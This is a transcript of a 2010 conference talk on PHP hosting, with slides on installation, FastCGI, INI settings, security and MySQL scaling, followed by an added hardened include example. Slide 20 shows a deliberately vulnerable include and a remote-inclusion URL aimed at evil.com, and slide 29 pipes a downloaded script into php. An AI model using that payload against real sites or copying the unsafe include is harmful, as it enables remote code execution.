Php through the eyes of a hoster pbc10


Slides for my "PHP through the eyes of a hoster" talk at PHP Barcelona Conference 2010


  1. PHP through the eyes of a hoster. Thijs Feryn, Support manager, +32 (0)9 218 79 06, thijs@combellgroup.com. PHP Barcelona Conference, Saturday October 30th 2010, Barcelona, Spain
  2. About me: I’m the support manager at Combell
  3. About me: I’m a board member at PHPBenelux
  4. I live in the wonderful city of Bruges (photo: MPBecker - Bruges by Night, http://www.flickr.com/photos/galverson2/3715965933)
  5. Follow me on Twitter: @ThijsFeryn. Rate my talk: http://joind.in. Read my blog: http://blog.feryn.eu
  6. Chapter I: The hoster, a genuine stakeholder in the PHP universe
  7. Stakeholders: Customer, Development company, Endusers, MGMT, Internal IT, Internal PM, Devs, Sales, MGMT, QA, Design, Systeam, PM, Consultants, Hoster, PHP community
  8. Stakeholders: Your app needs to be hosted. Somewhere along the road ...
  9. Goals & motives. Our goals & motives are the same as yours:
      • It has to work
      • It has to perform
      • It has to scale
      • It has to be secure
      • It has to be available
  10. Chapter II: Installation & configuration
  11. Installing from source
      server$ ./configure --prefix=/usr/local/php-5.2.10 \
          --with-apxs2=/usr/local/httpd-2.2.12/bin/apxs --with-zlib \
          --with-curl --with-gd --enable-mbstring --with-mysql \
          --with-mysqli --enable-pcntl --with-pdo-mysql --with-readline \
          --enable-soap --with-xsl --with-mcrypt --with-mssql --with-snmp \
          --with-imap --with-kerberos --with-imap-ssl \
          --with-config-file-path=/etc/php5/ --enable-sockets \
          --with-freetype-dir --with-openssl
      server$ make
      server$ make install
  12. Installing using a package manager (APT/Aptitude)
      Install PHP:
      server$ apt-get install php5
      Install MySQL library for PHP:
      server$ apt-get install php5-mysql
  13. SAPI ... schmapi
                      Mod_php             FastCGI                        CLI
      Web             Apache module       gateway                        -
      Process         Apache process      php-cgi                        php
      Configuration   Apache conf files   wrapper                        on the fly
      User            Apache user         shell user or suexec user      shell user
  14. FastCGI. Example config:
      • Apache handler
      <IfModule mod_fcgid.c>
          SuexecUserGroup dev dev
          PHP_Fix_Pathinfo_Enable 1
          <Directory /var/www/dev/www/>
              Options +ExecCGI
              AllowOverride All
              AddHandler fcgid-script .php
              FCGIWrapper /var/www/dev/etc/fcgi.wrapper .php
              Order allow,deny
              Allow from all
          </Directory>
      </IfModule>
  15. FastCGI. Example config:
      • Wrapper script
      #!/bin/sh
      PHPRC=/usr/local/php-5.3.1/etc
      export PHPRC
      export PHP_FCGI_MAX_REQUESTS=5000
      export PHP_FCGI_CHILDREN=8
      exec /usr/local/php-5.3.1/bin/php-cgi
  16. INI settings: tales of good & evil
  17. INI settings: tales of good & evil. Defining INI settings:
      • php.ini
      • ini_set()
      • “-d”
      • php_value
      • php_flag
      • php_admin_value
      • php_admin_flag
  18. INI settings: tales of good & evil. memory_limit:
      Fatal error: Allowed memory size of 16777216 bytes exhausted (tried to allocate 35 bytes)
  19. INI settings: tales of good & evil. safe_mode & open_basedir:
      <IfModule mod_php5.c>
          php_admin_flag engine on
          php_admin_flag safe_mode off
          php_admin_value open_basedir "/var/www/vhosts/website.com/httpdocs:/tmp"
      </IfModule>
  20. INI settings: tales of good & evil. allow_url_fopen:
      <?php
      $lang= $_GET['lang'];
      require("$lang.php");

      http://domain.ext/index.php?lang=http://evil.com/hack.txt?
  21. Chapter III: Versions & features
  22. PHP 4: End of life, but far from dead
  23. PHP 4: End of life, but far from dead
      Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in test.php on line 4
  24. Developers love bling bling
  25. It HAS to be PHP 5.3.2 !!!
  26. I need ALL PHP extensions !!!
  27. I use ALL PHP features !!!
  28. Fruit & vegetables: PEAR & PECL
  29. Fruit & vegetables: PEAR & PECL. PEAR: PHP Extension and Application Repository (http://pear.php.net)
      server$ pear install date
      server$ lynx -source http://pear.php.net/go-pear | php
  30. Fruit & vegetables: PEAR & PECL. PECL (pickle): PHP Extension Community Library (http://pecl.php.net)
      server$ pecl install pecl_http
  31. Popular frameworks outside the PHP project: External frameworks
  32. Chapter IV: PHP attracts a crowd
  33. It’s easy !
  34. That easy !
      <?php
      echo "Hello world!";
  35. It’s cheap !
  36. It’s stable !
  37. Everyone can be a PHP developer
  38. But not everyone has what it takes
  39. Luckily there’s a lot of ready-to-use PHP software out there
  40. Who you gonna call ?
  41. But when helpers need help ...
  42. They reach out to the PHP community: Blogs, Forums, User Group meetings, Conferences, PHP.net, Twitter, IRC
  43. Chapter V: Here be phpirates
  44. Here be phpirates
  45. Fact: “The majority of hacking/abuse cases are PHP related”
  46. False assumptions: “Open source is evil”. “PHP has lots of security vulnerabilities and is not mature”
  47. Here be phpirates. The real issues:
      • Quality of the code
      • Network & server security
      • PHP version & configuration
  48. Responsibilities
  49. Chapter VI: Scalability
  50. Performance == speed
  51. Scalability == constant speed under increasing load
  52. Scaling up
  53. Scaling out
  54. Developers (sometimes) forget ...
  55. Scaling MySQL
  56. mysql> explain SELECT field1, (SELECT COUNT(*) FROM table2 WHERE field3 = table1.id) FROM table1 WHERE field2 = 1 ORDER BY field4 DESC limit 12,12;
      *************************** 1. row ***************************
                 id: 1
        select_type: PRIMARY
              table: table1
               type: ALL
      possible_keys: approved
                key: approved
            key_len: NULL
                ref: NULL
               rows: 3143
              Extra: Using where; Using filesort
      *************************** 2. row ***************************
                 id: 2
        select_type: DEPENDENT SUBQUERY
              table: table2
               type: ALL
      possible_keys: NULL
                key: NULL
            key_len: NULL
                ref: NULL
               rows: 1005
              Extra: Using where
  57. mysql> show processlist;
      +-------+------+-----------+----+---------+------+----------------------+-------------------------------------------------+
      | Id    | User | Host      | db | Command | Time | State                | Info                                            |
      +-------+------+-----------+----+---------+------+----------------------+-------------------------------------------------+
      | 63515 | root | localhost | db | Query   |    0 | NULL                 | show processlist                                |
      | 81763 | root | localhost | db | Sleep   |  105 |                      | NULL                                            |
      | 85187 | root | localhost | db | Query   |    0 | Sending data         | SELECT data from someTable where field = 'val'  |
      | 82701 | root | localhost | db | Query   |    0 | Copying to tmp table | SELECT data from someTable where field='val2'   |
      | 82709 | root | localhost | db | Query   |    0 | Sorting result       | SELECT data from someTable where order by field |
      | 82716 | root | localhost | db | Query   |    0 | Opening tables       | SELECT data from someOtherTable                 |
      +-------+------+-----------+----+---------+------+----------------------+-------------------------------------------------+
  58. Scaling MySQL with replication
  59. PHP scalability toolbox
  60. Memcached
  61. Gearman
  62. Varnish
  63. Summary
  64. Summary
      1. Hosters are a genuine stakeholder in the PHP universe
      2. PHP is highly flexible & configurable. Hosters have to ensure a decent setup
      3. PHP has a lot to offer feature-wise
      4. PHP attracts a crowd and brings a lot of people together from different industries (e.g. hosters)
      5. Lots of abuse cases are PHP related, but that’s not the fault of PHP itself
      6. PHP itself doesn’t scale *that* well, but is flexible enough to ensure scalability via extra tools
  65. Q&A
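
Added example, not part of the original slides: a hardened counterpart to the require("$lang.php") snippet on slide 20, plus a report of the INI settings from slides 19 and 20 that decide whether a remote include can happen at all. The language codes, the lang/ directory and the function name resolveLangFile() are assumptions made for this illustration. Since PHP 5.2.0 a remote include additionally requires allow_url_include, which is off by default.

```php
<?php
// Added example (not from the slides): allowlist-based replacement for
// require("$lang.php"). LANG_DIR, ALLOWED_LANGS and resolveLangFile()
// are hypothetical names chosen for this illustration.

const LANG_DIR = __DIR__ . '/lang';
const ALLOWED_LANGS = ['en', 'nl', 'fr', 'es'];   // constructed sample set
const DEFAULT_LANG = 'en';

/**
 * Map untrusted input to a path that can only ever be one of the
 * allowlisted language files. The request value is never concatenated
 * into the path; it is only compared against known-good values.
 */
function resolveLangFile($input): string
{
    // Arrays (?lang[]=x), null and other non-strings fall back to the default.
    $lang = is_string($input) ? $input : DEFAULT_LANG;
    if (!in_array($lang, ALLOWED_LANGS, true)) {
        $lang = DEFAULT_LANG;
    }
    return LANG_DIR . '/' . $lang . '.php';
}

// Constructed sample inputs, including the URL shown on slide 20.
$samples = [
    'nl',
    'http://evil.com/hack.txt?',
    '../../etc/passwd',
    ['en'],
    null,
];
foreach ($samples as $sample) {
    printf(
        "%-32s => %s\n",
        json_encode($sample, JSON_UNESCAPED_SLASHES),
        basename(resolveLangFile($sample))
    );
}

// Defence in depth: show the runtime settings that govern remote
// includes and filesystem reach for this SAPI/vhost.
foreach (['allow_url_fopen', 'allow_url_include', 'open_basedir'] as $key) {
    printf("%-18s = %s\n", $key, var_export(ini_get($key), true));
}

// In the real page the include becomes:
//   require resolveLangFile($_GET['lang'] ?? null);
```

Only the first sample resolves to nl.php; every other input, including the remote URL, falls back to en.php.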
